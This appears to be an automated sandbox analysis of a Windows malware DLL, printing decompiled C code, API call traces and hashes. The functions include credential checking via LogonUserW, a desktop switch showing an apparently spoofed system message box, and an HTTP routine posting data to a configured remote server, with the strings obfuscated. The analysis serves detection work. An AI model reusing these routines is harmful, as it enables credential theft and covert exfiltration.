                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32 ref: 70981CE7
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70981CF9
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70981D00
                                                                                                        • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 70981D35
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Free$Heap$LibraryMemoryProcessVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1020761401-0
                                                                                                        • Opcode ID: fe0abcf666cbc0e1a596add02492a94035dd4756498a7b4b71e7987c8b2bf6ac
                                                                                                        • Instruction ID: b529c28dcb418d12dd0c2841a39bdb07d22bd39d0a79f578887e7081dc4cd822
                                                                                                        • Opcode Fuzzy Hash: fe0abcf666cbc0e1a596add02492a94035dd4756498a7b4b71e7987c8b2bf6ac
                                                                                                        • Instruction Fuzzy Hash: D52138B2214704DFE720CE54D880B6BB3ADBB84755F104A2DE596867C0C770F848CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709854A0, Relevance: 4.5, APIs: 3, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709854A0(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
				void* _v4;
				long _t16;
				int _t17;

				_t16 = 0;
				_v4 = 0;
				_t17 = LogonUserW(_a4, _a8, _a12, 2, 0,  &_v4);
				if(_t17 != 0 || GetLastError() == 0x52f) {
					_t16 = 1;
					if(_t17 != 0) {
						CloseHandle(_v4);
					}
				}
				return _t16;
			}






                                                                                                        0x709854b4
                                                                                                        0x709854bc
                                                                                                        0x709854c6
                                                                                                        0x709854ca
                                                                                                        0x709854d9
                                                                                                        0x709854e0
                                                                                                        0x709854e7
                                                                                                        0x709854e7
                                                                                                        0x709854e0
                                                                                                        0x709854f2

                                                                                                        APIs
                                                                                                        • LogonUserW.ADVAPI32(00B76080,00B76080,70989B2D,00000002,00000000,00B71E90), ref: 709854C0
                                                                                                        • GetLastError.KERNEL32(?,?,00B76080,70989B2D,00B76080,00B71E90,7098C560), ref: 709854CC
                                                                                                        • CloseHandle.KERNEL32(00B71E90,?,?,00B76080,70989B2D,00B76080,00B71E90,7098C560), ref: 709854E7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseErrorHandleLastLogonUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 917161313-0
                                                                                                        • Opcode ID: e72ce68058ee6f167c6d2a5491adc4412909c1d57fc6aa2ea2a1618ab581ef48
                                                                                                        • Instruction ID: a29a66bc1e091dd141a8809f0324ba90ec191ee11dac64f397b7b765cd45a89c
                                                                                                        • Opcode Fuzzy Hash: e72ce68058ee6f167c6d2a5491adc4412909c1d57fc6aa2ea2a1618ab581ef48
                                                                                                        • Instruction Fuzzy Hash: 97F03AB66182116BD2218B25E848E5B7BA9EBC8762F10862CF946D7390C730DC44D762
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A180, Relevance: 87.8, APIs: 49, Strings: 1, Instructions: 325memorywindowsleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E7098A180() {
				intOrPtr _v56;
				short _v544;
				short _v552;
				void* _v564;
				WCHAR* _v568;
				void* _v572;
				WCHAR* _v576;
				WCHAR* _v580;
				char _v604;
				char* _v608;
				intOrPtr _v612;
				WCHAR* _v620;
				void* _v624;
				void* _v628;
				void* _v636;
				void* _v640;
				void* _v644;
				void* _v648;
				void* _v652;
				void* _v656;
				void* _v660;
				char _v664;
				struct HINSTANCE__* _v668;
				int _v684;
				void* _v688;
				short _v692;
				short _v696;
				struct HDESK__* _t62;
				short* _t72;
				PWCHAR* _t73;
				WCHAR* _t76;
				WCHAR* _t112;
				WCHAR* _t119;
				void* _t123;
				WCHAR* _t124;
				WCHAR* _t125;
				struct HDESK__* _t126;
				struct HDESK__* _t127;
				struct HDESK__* _t134;
				intOrPtr _t136;
				struct HINSTANCE__* _t142;
				void* _t145;
				struct HINSTANCE__* _t146;
				WCHAR* _t147;
				WCHAR* _t148;
				WCHAR* _t149;
				WCHAR* _t150;
				WCHAR* _t151;
				WCHAR* _t152;
				WCHAR* _t155;
				void* _t156;
				void* _t157;
				void* _t158;

				_t62 =  *0x7098f530; // 0x0
				SwitchDesktop(_t62);
				_t126 =  *0x7098f530; // 0x0
				SetThreadDesktop(_t126);
				__imp__CoInitializeEx(0, 6);
				_t146 = LoadLibraryW(StrChrW(0x7098cf30, 0x63));
				_v668 = _t146;
				if(_t146 == 0) {
					L39:
					__imp__CoUninitialize();
					_t127 =  *0x7098f534; // 0x0
					SwitchDesktop(_t127);
					_t134 =  *0x7098f534; // 0x0
					SetThreadDesktop(_t134);
					return 0;
				}
				_push(0xff000000);
				_push(1);
				_push( &_v664);
				_push(_t146);
				_v664 = 0xc590294f;
				_v660 = 0;
				_v656 = 0;
				_v652 = 0;
				E70981E40();
				_t157 = _t156 + 0x10;
				if(_v652 != 0) {
					_t72 = GetCommandLineW();
					_v684 = 0;
					_t73 = CommandLineToArgvW(_t72,  &_v684);
					_v688 = _t73;
					if(_t73 != 0) {
						if(_v692 > 3) {
							_t76 = StrChrW(0x7098cf18, 0x44);
							_t136 =  *0x7098f578; // 0xb63c90
							_push(_t76);
							_push(_t136);
							wsprintfW( &_v552, StrChrW(0x7098c658, 0x25));
							_t158 = _t157 + 0x10;
							_t142 = LoadLibraryExW( &_v544, 0, 0x20);
							if(_t142 != 0) {
								_t145 = HeapAlloc(GetProcessHeap(), 8, 0x1770);
								if(_t145 != 0) {
									_t23 = _t145 + 0x190; // 0x190
									_t147 = _t23;
									if(LoadStringW(_t142, 0x79, _t147, 0xc8) > 0) {
										_v620 = _t147;
									}
									_t25 = _t145 + 0x320; // 0x320
									_t148 = _t25;
									if(LoadStringW(_t142, 0x7c, _t148, 0x3e8) > 0) {
										_t119 = StrChrW(_t148, 0xa);
										if(_t119 != 0) {
											_v620 =  &(_t119[1]);
										}
									}
									_t27 = _t145 + 0xaf0; // 0xaf0
									_t149 = _t27;
									if(FormatMessageW(0xaff, _t142, 0x50000001, 0, _t149, 0x64, 0) != 0) {
										_v568 = _t149;
									}
									_t29 = _t145 + 0xbb8; // 0xbb8
									_t150 = _t29;
									if(LoadStringW(_t142, 0x1b0, _t150, 0x64) > 0) {
										_t30 = _t145 + 0xc80; // 0xc80
										if(LoadStringW(_t142, 0xf6, _t30, 0x64) > 0) {
											_t31 = _t145 + 0xc80; // 0xc80
											_v652 = _t31;
											_v664 = 1;
											_v660 = _t150;
											_v656 = 8;
											_v612 = 2;
											_v604 = 1;
											_v608 =  &_v664;
										}
									}
									_t40 = _t145 + 0xd48; // 0xd48
									_t151 = _t40;
									if(LoadStringW(_t142, 0x7e, _t151, 0x64) > 0) {
										_v576 = _t151;
									}
									_t42 = _t145 + 0xe10; // 0xe10
									_t152 = _t42;
									if(LoadStringW(_t142, 0x7f, _t152, 0x64) > 0) {
										_v580 = _t152;
									}
									_t44 = _t145 + 0xed8; // 0xed8
									if(LoadStringW(_t142, 0x81, _t44, 0xc8) > 0) {
										PathBuildRootW( &_v692, PathGetDriveNumberW( &_v552));
										_t47 = _t145 + 0x1068; // 0x1068
										_t125 = _t47;
										GetVolumeInformationW( &_v696, _t125, 0x64, 0, 0, 0, 0, 0);
										_v692 = 0;
										_t50 = _t145 + 0x1130; // 0x1130
										_t155 = _t50;
										if( *_t125 != 0) {
											_t112 = _t125;
										} else {
											_t112 = StrChrW(0x7098cf08, 0x3c);
										}
										_t52 = _t145 + 0xed8; // 0xed8
										wsprintfW(_t155, _t52,  &_v696, _t112);
										_t158 = _t158 + 0x10;
										_v580 = _t155;
									}
									_t123 = HeapAlloc(GetProcessHeap(), 0, 0x20a);
									if(_t123 != 0) {
										wsprintfW(_t123, StrChrW(0x7098ced0, 0x2f));
										E7098A0B0(0, 0x83f2, _t123);
										_v684( &_v664, 0, 0, 0, 0, 0,  *((intOrPtr*)(_v696 + 0xc)), 5);
										HeapFree(GetProcessHeap(), 0, _t123);
										if(_v56 != 0) {
											Sleep(0x1f4);
											E70989B10(0);
										}
										Sleep(0x1f4);
									}
									if(FormatMessageW(0xaff, _t142, 0xb0000002, 0, _t145, 0x1f4, 0) != 0) {
										_t59 = _t145 + 0x3e8; // 0x3e8
										_t124 = _t59;
										if(FormatMessageW(0xaff, _t142, 0x50000004, 0, _t124, 0x64, 0) != 0) {
											MessageBoxW(0, _t145, _t124, 0x40);
											Sleep(0x1f4);
										}
									}
									HeapFree(GetProcessHeap(), 0, _t145);
									_t146 = _v684;
								}
								FreeLibrary(_t142);
							}
						}
						LocalFree(_v688);
					}
				}
				FreeLibrary(_t146);
				goto L39;
			}
























































                                                                                                        0x7098a186
                                                                                                        0x7098a18f
                                                                                                        0x7098a195
                                                                                                        0x7098a19c
                                                                                                        0x7098a1a7
                                                                                                        0x7098a1c3
                                                                                                        0x7098a1c5
                                                                                                        0x7098a1cb
                                                                                                        0x7098a592
                                                                                                        0x7098a592
                                                                                                        0x7098a598
                                                                                                        0x7098a59f
                                                                                                        0x7098a5a5
                                                                                                        0x7098a5ac
                                                                                                        0x7098a5bd
                                                                                                        0x7098a5bd
                                                                                                        0x7098a1d1
                                                                                                        0x7098a1d6
                                                                                                        0x7098a1dc
                                                                                                        0x7098a1dd
                                                                                                        0x7098a1de
                                                                                                        0x7098a1e6
                                                                                                        0x7098a1ea
                                                                                                        0x7098a1ee
                                                                                                        0x7098a1f2
                                                                                                        0x7098a1f7
                                                                                                        0x7098a1fe
                                                                                                        0x7098a204
                                                                                                        0x7098a210
                                                                                                        0x7098a214
                                                                                                        0x7098a21a
                                                                                                        0x7098a220
                                                                                                        0x7098a22b
                                                                                                        0x7098a239
                                                                                                        0x7098a23b
                                                                                                        0x7098a241
                                                                                                        0x7098a242
                                                                                                        0x7098a255
                                                                                                        0x7098a25b
                                                                                                        0x7098a26f
                                                                                                        0x7098a273
                                                                                                        0x7098a28d
                                                                                                        0x7098a291
                                                                                                        0x7098a2f7
                                                                                                        0x7098a2f7
                                                                                                        0x7098a305
                                                                                                        0x7098a307
                                                                                                        0x7098a307
                                                                                                        0x7098a310
                                                                                                        0x7098a310
                                                                                                        0x7098a31e
                                                                                                        0x7098a323
                                                                                                        0x7098a32b
                                                                                                        0x7098a330
                                                                                                        0x7098a330
                                                                                                        0x7098a32b
                                                                                                        0x7098a338
                                                                                                        0x7098a338
                                                                                                        0x7098a354
                                                                                                        0x7098a356
                                                                                                        0x7098a356
                                                                                                        0x7098a35f
                                                                                                        0x7098a35f
                                                                                                        0x7098a370
                                                                                                        0x7098a374
                                                                                                        0x7098a385
                                                                                                        0x7098a387
                                                                                                        0x7098a392
                                                                                                        0x7098a39a
                                                                                                        0x7098a39e
                                                                                                        0x7098a3a2
                                                                                                        0x7098a3aa
                                                                                                        0x7098a3b2
                                                                                                        0x7098a3b6
                                                                                                        0x7098a3b6
                                                                                                        0x7098a385
                                                                                                        0x7098a3bc
                                                                                                        0x7098a3bc
                                                                                                        0x7098a3ca
                                                                                                        0x7098a3cc
                                                                                                        0x7098a3cc
                                                                                                        0x7098a3d5
                                                                                                        0x7098a3d5
                                                                                                        0x7098a3e3
                                                                                                        0x7098a3e5
                                                                                                        0x7098a3e5
                                                                                                        0x7098a3f1
                                                                                                        0x7098a402
                                                                                                        0x7098a418
                                                                                                        0x7098a42a
                                                                                                        0x7098a42a
                                                                                                        0x7098a436
                                                                                                        0x7098a43e
                                                                                                        0x7098a443
                                                                                                        0x7098a443
                                                                                                        0x7098a44c
                                                                                                        0x7098a45d
                                                                                                        0x7098a44e
                                                                                                        0x7098a455
                                                                                                        0x7098a455
                                                                                                        0x7098a465
                                                                                                        0x7098a46d
                                                                                                        0x7098a473
                                                                                                        0x7098a476
                                                                                                        0x7098a476
                                                                                                        0x7098a493
                                                                                                        0x7098a497
                                                                                                        0x7098a4b2
                                                                                                        0x7098a4c7
                                                                                                        0x7098a4d7
                                                                                                        0x7098a4e1
                                                                                                        0x7098a4ef
                                                                                                        0x7098a4f6
                                                                                                        0x7098a4fe
                                                                                                        0x7098a4fe
                                                                                                        0x7098a508
                                                                                                        0x7098a508
                                                                                                        0x7098a52d
                                                                                                        0x7098a533
                                                                                                        0x7098a533
                                                                                                        0x7098a54b
                                                                                                        0x7098a553
                                                                                                        0x7098a55e
                                                                                                        0x7098a55e
                                                                                                        0x7098a54b
                                                                                                        0x7098a56e
                                                                                                        0x7098a574
                                                                                                        0x7098a574
                                                                                                        0x7098a579
                                                                                                        0x7098a579
                                                                                                        0x7098a57f
                                                                                                        0x7098a585
                                                                                                        0x7098a585
                                                                                                        0x7098a220
                                                                                                        0x7098a58c
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SwitchDesktop.USER32(00000000), ref: 7098A18F
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 7098A19C
                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 7098A1A7
                                                                                                        • StrChrW.SHLWAPI(7098CF30,00000063), ref: 7098A1BA
                                                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 7098A1BD
                                                                                                        • GetCommandLineW.KERNEL32(FF000000), ref: 7098A204
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 7098A214
                                                                                                        • StrChrW.SHLWAPI(7098CF18,00000044), ref: 7098A239
                                                                                                        • StrChrW.SHLWAPI(7098C658,00000025,00B63C90,00000000), ref: 7098A24A
                                                                                                        • wsprintfW.USER32 ref: 7098A255
                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000020), ref: 7098A269
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001770), ref: 7098A280
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098A287
                                                                                                        • RtlZeroMemory.NTDLL(?,00000060), ref: 7098A29E
                                                                                                        • LoadStringW.USER32 ref: 7098A2E8
                                                                                                        • LoadStringW.USER32(00000000,00000079,00000190,000000C8), ref: 7098A301
                                                                                                        • LoadStringW.USER32(00000000,0000007C,00000320,000003E8), ref: 7098A31A
                                                                                                        • StrChrW.SHLWAPI(00000320,0000000A), ref: 7098A323
                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000001,00000000,00000AF0,00000064,00000000), ref: 7098A34C
                                                                                                        • LoadStringW.USER32(00000000,000001B0,00000BB8,00000064), ref: 7098A36C
                                                                                                        • LoadStringW.USER32(00000000,000000F6,00000C80,00000064), ref: 7098A381
                                                                                                        • LoadStringW.USER32(00000000,0000007E,00000D48,00000064), ref: 7098A3C6
                                                                                                        • LoadStringW.USER32(00000000,0000007F,00000E10,00000064), ref: 7098A3DF
                                                                                                        • LoadStringW.USER32(00000000,00000081,00000ED8,000000C8), ref: 7098A3FE
                                                                                                        • PathGetDriveNumberW.SHLWAPI(?), ref: 7098A40C
                                                                                                        • PathBuildRootW.SHLWAPI(?,00000000), ref: 7098A418
                                                                                                        • GetVolumeInformationW.KERNEL32(?,00001068,00000064,00000000,00000000,00000000,00000000,00000000), ref: 7098A436
                                                                                                        • StrChrW.SHLWAPI(7098CF08,0000003C), ref: 7098A455
                                                                                                        • wsprintfW.USER32 ref: 7098A46D
                                                                                                        • GetProcessHeap.KERNEL32(00000000,0000020A), ref: 7098A48A
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098A48D
                                                                                                        • StrChrW.SHLWAPI(7098CED0,0000002F,?,00000005), ref: 7098A4AA
                                                                                                        • wsprintfW.USER32 ref: 7098A4B2
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098A4DE
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098A4E1
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 7098A4F6
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 7098A508
                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,B0000002,00000000,00000000,000001F4,00000000), ref: 7098A529
                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000004,00000000,000003E8,00000064,00000000), ref: 7098A547
                                                                                                        • MessageBoxW.USER32(00000000,00000000,000003E8,00000040), ref: 7098A553
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 7098A55E
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098A567
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098A56E
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 7098A579
                                                                                                        • LocalFree.KERNEL32(?), ref: 7098A585
                                                                                                        • FreeLibrary.KERNEL32(00000000,FF000000), ref: 7098A58C
                                                                                                        • CoUninitialize.OLE32 ref: 7098A592
                                                                                                        • SwitchDesktop.USER32(00000000), ref: 7098A59F
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 7098A5AC
                                                                                                          • Part of subcall function 70981E40: lstrlenA.KERNEL32(00000100,00000100,00000000,?,?,?,?,?,70989143), ref: 70981ECE
                                                                                                          • Part of subcall function 70981E40: RtlComputeCrc32.NTDLL ref: 70981ED8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Load$HeapString$Free$DesktopLibraryMessageProcess$FormatSleepwsprintf$AllocCommandLinePathSwitchThread$ArgvBuildComputeCrc32DriveInformationInitializeLocalMemoryNumberRootUninitializeVolumeZerolstrlen
                                                                                                        • String ID: `
                                                                                                        • API String ID: 3812327194-2679148245
                                                                                                        • Opcode ID: b29ede43413f09188b6bb49822197d3d6701347c08be78f704d0279a4300435d
                                                                                                        • Instruction ID: 5982bb585ace1dc2b9303fdde0bf14b0db2445a3e9ce2612a22edd66701da070
                                                                                                        • Opcode Fuzzy Hash: b29ede43413f09188b6bb49822197d3d6701347c08be78f704d0279a4300435d
                                                                                                        • Instruction Fuzzy Hash: 40B171B2258305AFF3209FA1CC89F6F7BACEB44B40F10482DF756962D0DBB494449B26
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985A50, Relevance: 73.8, APIs: 41, Strings: 1, Instructions: 306networkmemorysleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E70985A50() {
				WCHAR* _t69;
				WCHAR* _t79;
				long _t89;
				void* _t102;
				intOrPtr _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				int _t116;
				int _t119;
				long _t121;
				long _t125;
				intOrPtr _t127;
				void* _t128;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t156;
				void* _t157;
				long _t158;
				long _t160;
				intOrPtr _t161;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;

				 *((intOrPtr*)(_t163 + 0x24)) = 0;
				 *(_t163 + 0x20) = 0;
				_t3 = GetTickCount() + 0x493e0; // 0x493e0
				_t154 = _t3;
				 *(_t163 + 0x38) = _t154;
				while(1) {
					_t127 =  *((intOrPtr*)(_t163 + 0x40));
					_t158 = 0x842a0000;
					if( *(_t127 + 0xc) != 0) {
						_t158 = 0x84aa3300;
					}
					_t69 =  *0x7098f5c8; // 0xb64190
					_t152 = InternetOpenW(_t69, 1, 0, 0, 0);
					 *(_t163 + 0x30) = _t152;
					if(_t152 == 0) {
						L28:
						if(GetTickCount() >= _t154) {
							L32:
							return  *((intOrPtr*)(_t163 + 0x24));
						}
						Sleep(0x1388);
						continue;
					}
					 *(_t163 + 0x20) = 0x4e20;
					InternetSetOptionW(_t152, 2, _t163 + 0x14, 4);
					InternetSetOptionW(_t152, 5, _t163 + 0x14, 4);
					InternetSetOptionW(_t152, 6, _t163 + 0x14, 4);
					asm("sbb ecx, ecx");
					_t156 = InternetConnectW(_t152,  *(_t127 + 4), ( ~( *(_t127 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
					 *(_t163 + 0x34) = _t156;
					if(_t156 == 0) {
						L26:
						InternetCloseHandle(_t152);
						if( *(_t163 + 0x20) != 0) {
							goto L32;
						}
						_t154 =  *(_t163 + 0x38);
						goto L28;
					}
					_t79 = StrChrW(0x7098cd54, 0x48);
					_t128 = HttpOpenRequestW(_t156, StrChrW(0x7098cd48, 0x50),  *(_t127 + 8), _t79, 0, 0, _t158, 0);
					if(_t128 == 0) {
						L25:
						InternetCloseHandle(_t156);
						goto L26;
					}
					_t157 = HeapAlloc(GetProcessHeap(), 8, 0x1000);
					if(_t157 == 0) {
						L24:
						InternetCloseHandle(_t128);
						_t156 =  *(_t163 + 0x34);
						goto L25;
					}
					_push(StrChrW(0x7098cd1c, 0x43));
					_t89 = wsprintfW(_t157, StrChrW(0x7098c564, 0x25));
					_t163 = _t163 + 0xc;
					HttpAddRequestHeadersW(_t128, _t157, _t89, 0xa0000000);
					_t160 = 0;
					 *((intOrPtr*)(_t163 + 0x28)) = 0;
					 *((intOrPtr*)(_t163 + 0x18)) = 0;
					 *(_t163 + 0x1c) = 0;
					 *(_t163 + 0x30) = GetTickCount();
					 *(_t163 + 0x1c) = RtlRandom(_t163 + 0x2c);
					_t153 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t153 != 0) {
						_push( *((intOrPtr*)(_t163 + 0x44)));
						_push( *(_t163 + 0x14));
						 *(_t163 + 0x38) = _t153;
						_t116 = wsprintfA(_t153, StrChrA(0x7098cca0, 0x2d));
						_t164 = _t163 + 0x10;
						_push( *((intOrPtr*)(_t163 + 0x24)));
						_t160 = _t116;
						_t27 = _t160 + 1; // 0x1
						 *((intOrPtr*)(_t164 + 0x24)) = _t153 + _t27;
						_t119 = wsprintfA( *(_t164 + 0x20), StrChrA(0x7098cc88, 0x2d));
						_t139 =  *((intOrPtr*)(_t164 + 0x4c));
						_t165 = _t164 + 0xc;
						 *(_t165 + 0x1c) = _t119;
						_push( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x4c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x4c)) + 0x20)) +  *((intOrPtr*)(_t139 + 0x18)) + _t119 + _t160);
						_t121 = wsprintfW(_t157, StrChrW(0x7098cc58, 0x43));
						_t166 = _t165 + 0xc;
						HttpAddRequestHeadersW(_t128, _t157, _t121, 0xa0000000);
						_push( *((intOrPtr*)(_t166 + 0x14)));
						_t125 = wsprintfW(_t157, StrChrW(0x7098cbe0, 0x43));
						_t163 = _t166 + 0xc;
						HttpAddRequestHeadersW(_t128, _t157, _t125, 0xa0000000);
					}
					if(HttpSendRequestExW(_t128, 0, 0, 0, 0) == 0) {
						if(GetLastError() == 0x2f7d) {
							 *( *((intOrPtr*)(_t163 + 0x40)) + 0xc) = 0;
						}
						L21:
						if(_t153 != 0) {
							HeapFree(GetProcessHeap(), 0, _t153);
						}
						HeapFree(GetProcessHeap(), 0, _t157);
						_t152 =  *(_t163 + 0x30);
						goto L24;
					}
					 *(_t163 + 0x20) = _t160;
					_t102 = E709858A0(_t128,  *((intOrPtr*)(_t163 + 0x28)), _t163 + 0x14);
					_t163 = _t163 + 0xc;
					_t161 =  *((intOrPtr*)(_t163 + 0x40));
					if(_t102 != _t160) {
						L19:
						HttpEndRequestW(_t128, 0, 0, 0);
						if( *(_t163 + 0x20) != 0) {
							_t104 = E70985900(_t128, _t161 + 0x2c);
							_t163 = _t163 + 8;
							 *((intOrPtr*)(_t163 + 0x24)) = _t104;
						}
						goto L21;
					}
					_t105 = _t161 + 0x18;
					if( *((intOrPtr*)(_t161 + 0x18)) == 0) {
						L13:
						_t106 = _t161 + 0x20;
						if( *((intOrPtr*)(_t161 + 0x20)) == 0) {
							L15:
							_t107 = _t161 + 0x28;
							if( *((intOrPtr*)(_t161 + 0x28)) == 0) {
								L17:
								 *(_t163 + 0x34) =  *(_t163 + 0x1c);
								_t109 = E709858A0(_t128,  *((intOrPtr*)(_t163 + 0x18)), _t163 + 0x28);
								_t163 = _t163 + 0xc;
								if(_t109 ==  *(_t163 + 0x1c)) {
									 *(_t163 + 0x20) = 1;
								}
								goto L19;
							}
							_t110 = E709858A0(_t128,  *((intOrPtr*)(_t161 + 0x24)), _t107);
							_t163 = _t163 + 0xc;
							if(_t110 !=  *((intOrPtr*)(_t161 + 0x28))) {
								goto L19;
							}
							goto L17;
						}
						_t111 = E709858A0(_t128,  *((intOrPtr*)(_t161 + 0x1c)), _t106);
						_t163 = _t163 + 0xc;
						if(_t111 !=  *((intOrPtr*)(_t161 + 0x20))) {
							goto L19;
						}
						goto L15;
					}
					_t113 = E709858A0(_t128,  *((intOrPtr*)(_t161 + 0x14)), _t105);
					_t163 = _t163 + 0xc;
					if(_t113 !=  *((intOrPtr*)(_t161 + 0x18))) {
						goto L19;
					}
					goto L13;
				}
			}

































                                                                                                        0x70985a59
                                                                                                        0x70985a5d
                                                                                                        0x70985a67
                                                                                                        0x70985a67
                                                                                                        0x70985a6d
                                                                                                        0x70985a71
                                                                                                        0x70985a71
                                                                                                        0x70985a79
                                                                                                        0x70985a7e
                                                                                                        0x70985a80
                                                                                                        0x70985a80
                                                                                                        0x70985a85
                                                                                                        0x70985a99
                                                                                                        0x70985a9b
                                                                                                        0x70985aa1
                                                                                                        0x70985dae
                                                                                                        0x70985db6
                                                                                                        0x70985de2
                                                                                                        0x70985ded
                                                                                                        0x70985ded
                                                                                                        0x70985dbd
                                                                                                        0x00000000
                                                                                                        0x70985dbd
                                                                                                        0x70985ab7
                                                                                                        0x70985abf
                                                                                                        0x70985acb
                                                                                                        0x70985ad7
                                                                                                        0x70985ae9
                                                                                                        0x70985aff
                                                                                                        0x70985b01
                                                                                                        0x70985b07
                                                                                                        0x70985d9c
                                                                                                        0x70985d9d
                                                                                                        0x70985da8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985daa
                                                                                                        0x00000000
                                                                                                        0x70985daa
                                                                                                        0x70985b21
                                                                                                        0x70985b39
                                                                                                        0x70985b3d
                                                                                                        0x70985d95
                                                                                                        0x70985d96
                                                                                                        0x00000000
                                                                                                        0x70985d96
                                                                                                        0x70985b57
                                                                                                        0x70985b5b
                                                                                                        0x70985d8a
                                                                                                        0x70985d8b
                                                                                                        0x70985d91
                                                                                                        0x00000000
                                                                                                        0x70985d91
                                                                                                        0x70985b6a
                                                                                                        0x70985b76
                                                                                                        0x70985b7c
                                                                                                        0x70985b87
                                                                                                        0x70985b8d
                                                                                                        0x70985b8f
                                                                                                        0x70985b93
                                                                                                        0x70985b97
                                                                                                        0x70985ba6
                                                                                                        0x70985bb7
                                                                                                        0x70985bc8
                                                                                                        0x70985bcc
                                                                                                        0x70985bda
                                                                                                        0x70985bdb
                                                                                                        0x70985be3
                                                                                                        0x70985bef
                                                                                                        0x70985bf9
                                                                                                        0x70985bfc
                                                                                                        0x70985bfd
                                                                                                        0x70985c01
                                                                                                        0x70985c0a
                                                                                                        0x70985c1a
                                                                                                        0x70985c20
                                                                                                        0x70985c2a
                                                                                                        0x70985c30
                                                                                                        0x70985c38
                                                                                                        0x70985c48
                                                                                                        0x70985c4e
                                                                                                        0x70985c59
                                                                                                        0x70985c63
                                                                                                        0x70985c73
                                                                                                        0x70985c79
                                                                                                        0x70985c84
                                                                                                        0x70985c84
                                                                                                        0x70985c9b
                                                                                                        0x70985dd3
                                                                                                        0x70985dd9
                                                                                                        0x70985dd9
                                                                                                        0x70985d62
                                                                                                        0x70985d64
                                                                                                        0x70985d70
                                                                                                        0x70985d70
                                                                                                        0x70985d80
                                                                                                        0x70985d86
                                                                                                        0x00000000
                                                                                                        0x70985d86
                                                                                                        0x70985cac
                                                                                                        0x70985cb0
                                                                                                        0x70985cb5
                                                                                                        0x70985cba
                                                                                                        0x70985cbe
                                                                                                        0x70985d3d
                                                                                                        0x70985d44
                                                                                                        0x70985d4f
                                                                                                        0x70985d56
                                                                                                        0x70985d5b
                                                                                                        0x70985d5e
                                                                                                        0x70985d5e
                                                                                                        0x00000000
                                                                                                        0x70985d4f
                                                                                                        0x70985cc4
                                                                                                        0x70985cc7
                                                                                                        0x70985cdc
                                                                                                        0x70985ce0
                                                                                                        0x70985ce3
